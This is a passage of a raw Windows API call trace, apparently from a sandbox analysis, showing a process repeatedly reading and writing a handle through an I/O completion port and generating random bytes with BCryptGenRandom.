lpOverlapped=0x3df0008) returned 1 [0203.465] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.476] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.476] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.476] CloseHandle (hObject=0x2a8) returned 1 [0203.476] free (_Block=0x3df0008) [0203.476] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.483] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.483] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.483] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0203.483] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.483] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.483] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0203.483] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.483] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.484] free (_Block=0x3e305b8) [0203.484] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.484] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.484] free (_Block=0x1fa91d0) [0203.484] free (_Block=0x1fa2ed8) [0203.484] free (_Block=0x1fa90b8) [0203.484] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.484] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.484] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.485] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.493] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1f5, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.493] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.493] CloseHandle (hObject=0x2a8) returned 1 [0203.494] free (_Block=0x3df0008) [0203.494] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.499] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.500] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.500] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0203.500] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.500] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.500] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0203.500] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.500] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.500] free (_Block=0x3e305b8) [0203.500] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.500] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.501] free (_Block=0x1fa91d0) [0203.501] free (_Block=0x1fa2ed8) [0203.501] free (_Block=0x1fa90b8) [0203.501] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.501] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.501] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.501] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.510] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1a3, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.510] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.511] CloseHandle (hObject=0x2a8) returned 1 [0203.511] free (_Block=0x3df0008) [0203.511] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.517] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.517] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.517] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0203.517] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.517] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.517] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0203.518] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.518] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.518] free (_Block=0x3e305b8) [0203.518] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.518] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.518] free (_Block=0x1fa91d0) [0203.518] free (_Block=0x1fa2ed8) [0203.518] free (_Block=0x1fa90b8) [0203.518] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.518] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.518] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.519] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.527] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1a4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.527] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.528] CloseHandle (hObject=0x2a8) returned 1 [0203.528] free (_Block=0x3df0008) [0203.528] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.534] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.534] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.534] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0203.534] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.534] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.534] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0203.535] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.535] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.535] free (_Block=0x3e305b8) [0203.535] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.535] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.535] free (_Block=0x1fa91d0) [0203.535] free (_Block=0x1fa2ed8) [0203.535] free (_Block=0x1fa90b8) [0203.535] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.536] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.536] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.536] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.545] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1cf, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.545] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.545] CloseHandle (hObject=0x2a8) returned 1 [0203.545] free (_Block=0x3df0008) [0203.545] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.551] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.552] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.552] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0203.552] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.552] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.552] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0203.552] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.552] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.552] free (_Block=0x3e305b8) [0203.552] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.552] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.553] free (_Block=0x1fa91d0) [0203.553] free (_Block=0x1fa2ed8) [0203.553] free (_Block=0x1fa90b8) [0203.553] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.553] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.553] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.553] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.561] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xc6, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.561] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.562] CloseHandle (hObject=0x2a8) returned 1 [0203.562] free (_Block=0x3df0008) [0203.562] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.568] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.568] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.569] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0203.569] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.569] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.569] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0203.569] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.569] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.569] free (_Block=0x3e305b8) [0203.569] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.569] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.569] free (_Block=0x1fa91d0) [0203.569] free (_Block=0x1fa2ed8) [0203.569] free (_Block=0x1fa90b8) [0203.570] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.570] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.570] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.570] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.579] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb6, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.579] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.580] CloseHandle (hObject=0x2a8) returned 1 [0203.580] free (_Block=0x3df0008) [0203.580] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.586] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.586] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.586] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0203.586] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.586] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.586] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0203.587] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.587] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.587] free (_Block=0x3e305b8) [0203.587] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.587] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.587] free (_Block=0x1fa91d0) [0203.587] free (_Block=0x1fa2ed8) [0203.587] free (_Block=0x1fa90b8) [0203.587] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.587] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.588] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.588] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.807] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x40f6, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.827] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.838] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xfe, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.838] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.838] CloseHandle (hObject=0x2a8) returned 1 [0203.838] free (_Block=0x3df0008) [0203.838] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.845] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.846] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.846] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0203.846] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.846] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.846] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0203.846] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.846] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.846] free (_Block=0x3e305b8) [0203.846] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.846] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.847] free (_Block=0x1fa91d0) [0203.847] free (_Block=0x1fa2ed8) [0203.847] free (_Block=0x1fa90b8) [0203.847] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.847] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.847] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.847] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0203.855] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x4a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.855] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: 